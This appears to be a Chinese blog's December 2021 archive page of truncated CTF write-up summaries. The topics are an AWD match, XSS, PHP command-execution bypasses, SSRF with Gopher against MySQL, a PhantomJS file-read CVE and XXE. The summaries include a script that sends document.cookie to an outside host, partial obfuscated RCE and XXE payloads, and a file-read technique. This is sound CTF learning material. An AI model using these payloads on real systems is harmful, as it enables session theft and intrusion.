12 2021 档案
摘要:ctf打到现在第一次打AWD 这次是每组两个人有两个主机要保护,由于一共就比1.5h,前15分钟加固,后面是混战 目标是保护flag,同时两台主机的网站必须能访问(php),大家开始都一样 两台主机开始都不是root权限,我们开始进去首先改了下ssh密码,由于提示开始网站里有自带后门,所以尝试找后门
阅读全文
摘要:web316 <script>var img = document.createElement("img");//创建img标签 img.src = "http://ip?cookie="+document.cookie;//设置img标签的src </script>或者<script>locati
阅读全文
摘要:根据cookie里面的提示,get传入looklook参数 代码就是无符号命令执行,注意数字1到3和大写字母C没过滤 ~和|和^都过滤掉了,注意$没过滤,加减也没过滤可以尝试自增构造 payload ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_++;$_++
阅读全文
摘要:一个登入页面,登入没反应,抓包看一下 发现有一个url跳转,尝试ssrf读取文件 没成功 这里用Gopher 协议 攻击mysql写入 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以
阅读全文
摘要:web-118 测试了一下发现数字和字母过滤了,第一反应是无符号rce,发现走不通。 后面发现大写字母没过滤,这里可以参考月饼杯web3的方法 https://www.cnblogs.com/aninock/p/15360157.html 我们想办法输出 flag.php即可,输出语句可以用nl 可
阅读全文
摘要:一个输入框,输入后会返回一个图片是截图 但是大概率是爬虫爬取前端代码 在vps监听一下80端口 观察请求发现用的是PhantomJS 而查询可知,PhantomJS 2.1.1是有任意文件读取漏洞的,CVE-2019-17221 payload <!DOCTYPE html> <html> <hea
阅读全文
摘要:登入抓包 可以发现数据是以xml格式传入的,登入失败会返回账号,同样是xml格式 而xml格式可以引用外部实体(可以是本地文件) 尝试传入 <?xml version = "1.0" encoding = "utf-8"?><!DOCTYPE user [ <!ENTITY file SYSTEM
阅读全文
摘要:<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'
阅读全文